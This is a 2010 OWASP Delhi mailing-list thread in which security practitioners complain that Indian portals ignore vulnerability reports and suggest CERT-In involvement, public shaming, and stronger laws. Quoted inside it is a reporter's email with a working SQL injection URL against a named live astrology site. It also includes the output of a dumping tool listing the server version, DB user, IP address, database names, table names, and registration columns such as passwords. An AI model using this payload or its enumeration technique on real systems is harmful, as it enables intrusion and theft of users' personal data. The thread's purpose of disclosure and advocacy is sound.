[Owasp-delhi] Rediff Astrology

Ashish Saxena ashish at aksitservices.co.in
Wed Jun 16 05:52:23 EDT 2010


CERT-In has a charter to send advisories for improving national cyber
security. The organization also monitors attacks on web applications and
networks  including malware attacks.

 

We should write to CERT-In for issuances of necessary guidelines and
enforcing security measures.

 

Best wishes

 

Ashish

 

From: owasp-delhi-bounces at lists.owasp.org
[mailto:owasp-delhi-bounces at lists.owasp.org] On Behalf Of Lakshmanan, Sriram
Sent: Wednesday, June 16, 2010 1:51 PM
To: dhruv.soi at owasp.org; Subhash Dutta; Sripathi Krishnan
Cc: owasp-delhi
Subject: Re: [Owasp-delhi] Rediff Astrology

 

I don't know if it can happen under the ageis of OWASP or not but maybe we
need something like a Jagorey campaign and a "fall of shame". I'm banking on
this group's collective wisdom to do something...

*	The Jagorey like campaign is for the CxO forums who are often unware
of the problem in their own backyard as the tech manager never notified them
or didn't give them enough gyan (specially to CTO/CISO). Maybe leverage
NASSCOM for such forums (for contact points)
*	The fall of shame is for sites we identity as "bad" weak thru
non-intriusive testing and advise the public about the risks of the weakness
exists even after notification to the company. I understand such a list
opens up more hacks/attacks, and thus we can refrain from displaying the
vulnerable url and details on the attack. CERT-in may be leveraged for this.
I also do not know the complete legal interpretation of such a move (which
may include defamation suits) 

The point I'm trying to make is we know we have issues, with corporate
indfifference to security, with laws that are not enforced well, with
"security people" just doing what I call "khanapoorti" i.e action for the
sake of it. The problems will not go away. As a responsibile community can
we create a task force and collectively do something?. I do understand the
individual efforts like Nilesh's / Sripathi's or Subhash's and others have
fallen on deaf ears and is frustrating....maybe concerted and joint efforts
will bear fruits. 

 

Additional thoughts/comments/feedback...

 

 PS: I use Jagorey like as refernce, as Jagorey campaign is a TV advt
showing a movement against corruption.

 

warm regards,

Sriram

SEC_R_TY. U & I are in it together. Everyone's responsible - Everywhere

 

 

  _____  

From: owasp-delhi-bounces at lists.owasp.org
[mailto:owasp-delhi-bounces at lists.owasp.org] On Behalf Of Soi, Dhruv
Sent: Wednesday, June 16, 2010 12:44 PM
To: 'Subhash Dutta'; 'Sripathi Krishnan'
Cc: 'owasp-delhi'
Subject: Re: [Owasp-delhi] Rediff Astrology

Old saying and a song - "It happens only in India". Till the time laws
aren't enforced with a force, no one is bothered about security. Even laws
can be bypassed here, but atleast few would be trapped to set the example
for others.

 

When I explain India InfoSec to the friends abroad, I generally blame the
Indian mindset. Bike Riders here don't care about their personal security
and wear helmets only when there is strict police checking. Same is with the
car drivers for their seat belts. In Delhi, we find better police checking
so people are serious, but in other areas like Noida, no one cares. In a
nutshell, only strict laws can help Corporate India to be secure and deliver
secure.

 

 

From: owasp-delhi-bounces at lists.owasp.org
[mailto:owasp-delhi-bounces at lists.owasp.org] On Behalf Of Subhash Dutta
Sent: 16 June 2010 09:09
To: Sripathi Krishnan
Cc: owasp-delhi
Subject: Re: [Owasp-delhi] Rediff Astrology

 

Yes I have also noted the same. In fact, the imint card company stores
passwords as reversible encrypted and will tell you in plain text what your
password is in case you have forgotten it ;).  When brought to their notice,
I received a standard reply - Thanking for contacting us, we will get back
to you shortly.  Nobody has got back till date (1 year past).  I think
strong legislative punitive measures are the only solution.

Regards

Subhash Dutta


----- Original Message -----
From: "Sripathi Krishnan" <sripathi.krishnan at gmail.com>
To: "dhruv soi" <dhruv.soi at owasp.org>
Cc: owasp-delhi at lists.owasp.org, owasp-mumbai at lists.owasp.org,
owasp-bangalore at lists.owasp.org
Sent: Monday, June 14, 2010 11:25:23 PM GMT +05:30 Chennai, Kolkata, Mumbai,
New Delhi
Subject: Re: [Owasp-delhi] Rediff Astrology

Its not just rediff.com, almost all other Indian portals - in.com,
indiatimes.com and sify.com have similar problems. XSS, XSRF, SQL Injection,
Poor password/session management, open redirects .. the list is endless. 

 

I have written to each of the above portals several times in the past year,
and have given up. IMHO, they are not interested in securing their websites.

 

--Sri

On 14 June 2010 23:17, Soi, Dhruv <dhruv.soi at owasp.org> wrote:

Another one to notify Rediff that readers' daily fortune can be fixed by
someone.Seems Rediff needs a lot of OWASP, do inform them that its free!!

 

From: "Jack H4xor" 
Sent: 14 June 2010 12:07
To: dhruv.soi at owasp.org
Subject: Rediff Astrology

 

y0,


h0rr1bl3 th4n h0rr0r

Vulnerable Url : 

http://astrology.rediff.com/zodiaczone/astroparents-resultpg.asp?pzodiac=Sco
rpiox%27%20OR%201=convert%28int,@@version%29--

 

********************************************************************













 
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++













 














 














 
+     -==  MSSQL Information Schema astrology.rediff.com  ==-     +













 
 
 














 














 
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++













 














 














 
[ + ] URL :
http://astrology.rediff.com/zodiaczone/astroparents-resultpg.asp?pzo













 
 
 














 
diac=Scorpiox'













 














 














 
[ + ] Date: Tue May 18 20:58:26 2010













 
[ + ] Displaying information about MSSQL host !













 














 
[ + ] @@VERSION  :      Microsoft SQL Server  2000 - 8.00.194 (Intel X86)













 














 
                        Aug  6 2000 00:57:48













 
                        Copyright (c) 1988-2000 Microsoft Corporation













 
                        Standard Edition on Windows NT 5.0 (Build 2195:
Service













 
Pack 4)













 














 
[ + ] USER ()          : dbo













 














 
[ + ] S_USER ()        : astrology













 
[ + ] DB_NAME ()       : astro













 
[ + ] HOST_NAME ()     : ASTROLOGY













 
[ + ] SERVER_NAME ()   : SEARCHDB













 
[ + ] SERVER_TYPE ()   : Microsoft-IIS/6.0













 
[ + ] X-POWERED-By ()  : ASP.NET













 














 
[ + ] IP_ADDRESS_INFO  : 202.54.124.173













 














 














 
[ - ] We Can't get number of Databases !













 














 














 
[ ! ] Start dumping database Names !













 














 
[ ? ] But first choice number of DB to dump :> 20













 
 
 














 














 
[ + ] Displaying list of 20 databases on this MSSQL host !













 
 
 














 














 
[ DATABASE: 0 ]        : astro













 














 
[ DATABASE: 1 ]        : master













 
 
 














 
[ DATABASE: 2 ]        : tempdb













 
 
 














 
[ DATABASE: 3 ]        : model













 
 
 














 
[ DATABASE: 4 ]        : msdb













 
 
 














 
[ DATABASE: 5 ]        : pubs













 
 
 














 
[ DATABASE: 6 ]        : Northwind













 
 
 














 
[ DATABASE: 7 ]        : travel













 
 
 














 
[ DATABASE: 8 ]        : travel_int













 
 
 














 
[ DATABASE: 9 ]        : astro













 
 
 














 
[ DATABASE: 10 ]        : Jobsearch













 
 
 














 
[ DATABASE: 11 ]        : astroyogiD













 
 
 














 
[ DATABASE: 12 ]        : matrimonial













 
 
 














 
[ DATABASE: 13 ]        : investornew













 
 
 














 
[ DATABASE: 14 ]        : test













 
 
 














 














 
[ ! ] Vulnerability Database is   :  astro













 
 
 














 














 
[ + ] Displaying Tables inside DB :> astro













 














 














 
[ ? ] Numbers of Tables To Dispaly ?













 
 
 














 
[ + ] Specify Numbers   :> 200













 
 
 














 














 
[ TABLES: 0 ]          : ALLIANCE_PARTNER_COMMISSION













 














 
[ TABLES: 1 ]          : ALLIANCE_PARTNER_MASTER













 
 
 














 
[ TABLES: 2 ]          : astrolove













 
 
 














 
[ TABLES: 3 ]          : astroparent













 
 
 














 
[ TABLES: 4 ]          : CITY













 
 
 














 
[ TABLES: 5 ]          : COMPLETE_ORDER_DETAIL













 
 
 














 
[ TABLES: 6 ]          : COMPLETE_SUBSCRIPTION_DETAIL













 
 
 














 
[ TABLES: 7 ]          : COUNTRY













 
 
 














 
[ TABLES: 8 ]          : CUSTOMER_CARE_DETAILS













 
 
 














 
[ TABLES: 9 ]          : CUSTOMER_CARE_MASTER













 
 
 














 
[ TABLES: 10 ]          : CUSTOMER_PERSON1













 
 
 














 
[ TABLES: 11 ]          : CUSTOMER_PERSON2













 
 
 














 
[ TABLES: 12 ]          : CUSTOMER_PERSON3













 
 
 














 
[ TABLES: 13 ]          : darshtest













 
 
 














 
[ TABLES: 14 ]          : dtproperties













 
 
 














 
[ TABLES: 15 ]          : FENGSHUI













 
 
 














 
[ TABLES: 16 ]          : FRANCHISEE_MASTER













 
 
 














 
[ TABLES: 17 ]          : idealmate













 
 
 














 
[ TABLES: 18 ]          : INTERNATIONAL_PARTNER_MASTER













 
 
 














 
[ TABLES: 19 ]          : NUMEROLOGY













 
 
 














 
[ TABLES: 20 ]          : ORDER_DETAILS













 
 
 














 
[ TABLES: 21 ]          : ORDER_MASTER













 
 
 














 
[ TABLES: 22 ]          : ORDER_REMARKS













 
 
 














 
[ TABLES: 23 ]          : ORDERS













 
 
 














 
[ TABLES: 24 ]          : p1













 
 
 














 
[ TABLES: 25 ]          : p3master













 
 
 














 
[ TABLES: 26 ]          : PALMISTRY













 
 
 














 
[ TABLES: 27 ]          : PAYMENT_METHOD_MASTER













 
 
 














 
[ TABLES: 28 ]          : PROBLEM_ANSWER













 
 
 














 
[ TABLES: 29 ]          : PROBLEM_CATEGORY













 
 
 














 
[ TABLES: 30 ]          : REGISTRATION













 
 
 














 
[ TABLES: 31 ]          : SHIPPING_DETAILS













 
 
 














 
[ TABLES: 32 ]          : SPCFIC_ANLYS













 
 
 














 
[ TABLES: 33 ]          : SUBSCRIBER_DETAILS













 
 
 














 
[ TABLES: 34 ]          : SUBSCRIBER_MASTER













 
 
 














 
[ TABLES: 35 ]          : SUBSCRIBER_REGISTRATION













 
 
 














 
[ TABLES: 36 ]          : SUBSCRIBER_TRANSACTION













 
 
 














 
[ TABLES: 37 ]          : SUBSCRIPTION_DETAILS













 
 
 














 
[ TABLES: 38 ]          : SUBSCRIPTION_MASTER













 
 
 














 
[ TABLES: 39 ]          : sysconstraints













 
 
 














 
[ TABLES: 40 ]          : syssegments













 
 
 














 
[ TABLES: 41 ]          : test













 
 
 














 
[ TABLES: 42 ]          : USER_ASTROLOGER_PRODUCT_TRANSACTION













 
 
 














 
[ TABLES: 43 ]          : zodiac













 
 
 














 














 
[ + ] Done !













 














 














 
[ + ] Start dumping all Columns from table :> REGISTRATION













 
 
 














 














 
[ ? ] Numbers of Columns To Display ?













 
 
 














 
[ + ] Specify Numbers    :> 50













 
 
 














 














 
[ + ] Displaying 50 Columns inside Table: REGISTRATION and Database: astro













 
 
 














 














 
[ COLUMNS : REGISTRATION ] 0 ]         : FRANCHISEE_ID













 














 
[ COLUMNS : REGISTRATION ] 1 ]         : PARTNER_ID













 
 
 














 
[ COLUMNS : REGISTRATION ] 2 ]         : REGISTRATION_ADDRESS













 
 
 














 
[ COLUMNS : REGISTRATION ] 3 ]         : REGISTRATION_BIRTH_COUNTRY













 
 
 














 
[ COLUMNS : REGISTRATION ] 4 ]         : REGISTRATION_BIRTH_DATE













 
 
 














 
[ COLUMNS : REGISTRATION ] 5 ]         : REGISTRATION_BIRTH_PLACE













 
 
 














 
[ COLUMNS : REGISTRATION ] 6 ]         : REGISTRATION_BIRTH_TIME_HOUR













 
 
 














 
[ COLUMNS : REGISTRATION ] 7 ]         : REGISTRATION_BIRTH_TIME_MINUTES













 
 
 














 
[ COLUMNS : REGISTRATION ] 8 ]         : REGISTRATION_CELL_NO













 
 
 














 
[ COLUMNS : REGISTRATION ] 9 ]         : REGISTRATION_COUNTRY













 
 
 














 
[ COLUMNS : REGISTRATION ] 10 ]         : REGISTRATION_DATE













 
 
 














 
[ COLUMNS : REGISTRATION ] 11 ]         : REGISTRATION_EMAIL_ID













 
 
 














 
[ COLUMNS : REGISTRATION ] 12 ]         : REGISTRATION_FIRSTNAME













 
 
 














 
[ COLUMNS : REGISTRATION ] 13 ]         : REGISTRATION_GENDER













 
 
 














 
[ COLUMNS : REGISTRATION ] 14 ]         : REGISTRATION_ID













 
 
 














 
[ COLUMNS : REGISTRATION ] 15 ]         : REGISTRATION_IP













 
 
 














 
[ COLUMNS : REGISTRATION ] 16 ]         : REGISTRATION_LASTNAME













 
 
 














 
[ COLUMNS : REGISTRATION ] 17 ]         : REGISTRATION_PASSWORD













 
 
 














 
[ COLUMNS : REGISTRATION ] 18 ]         : REGISTRATION_TELEPHONE_NO













 
 
 














 
[ COLUMNS : REGISTRATION ] 19 ]         : REGISTRATION_USERNAME













 
 
 














 














 
[ ! ] Done !













 














 














 
[ ! ] All information was recorded in astrology.rediff.com.txt file !













 
 
 














 














 
[ 1 ] : Return to Tables  !













 














 
[ 2 ] : Return to Columns !













 
 
 














 














 
[ ? ] : Oprion :>













 














 














 














 
Thanks & Regards













 
Jackh4xor













 
( h4cky0u )


_______________________________________________
Owasp-delhi mailing list
Owasp-delhi at lists.owasp.org
https://lists.owasp.org/mailman/listinfo/owasp-delhi

 


_______________________________________________ Owasp-delhi mailing list
Owasp-delhi at lists.owasp.org
https://lists.owasp.org/mailman/listinfo/owasp-delhi 




This e-mail, including attachments, may include confidential and/or


proprietary information, and may be used only by the person or entity


to which it is addressed. If the reader of this e-mail is not the intended


recipient or his or her authorized agent, the reader is hereby notified


that any dissemination, distribution or copying of this e-mail is


prohibited. If you have received this e-mail in error, please notify the


sender by replying to this message and delete this e-mail immediately.
-------------- next part --------------
An HTML attachment was scrubbed...
URL: https://lists.owasp.org/pipermail/owasp-delhi/attachments/20100616/b693a07c/attachment-0001.html 


More information about the Owasp-delhi mailing list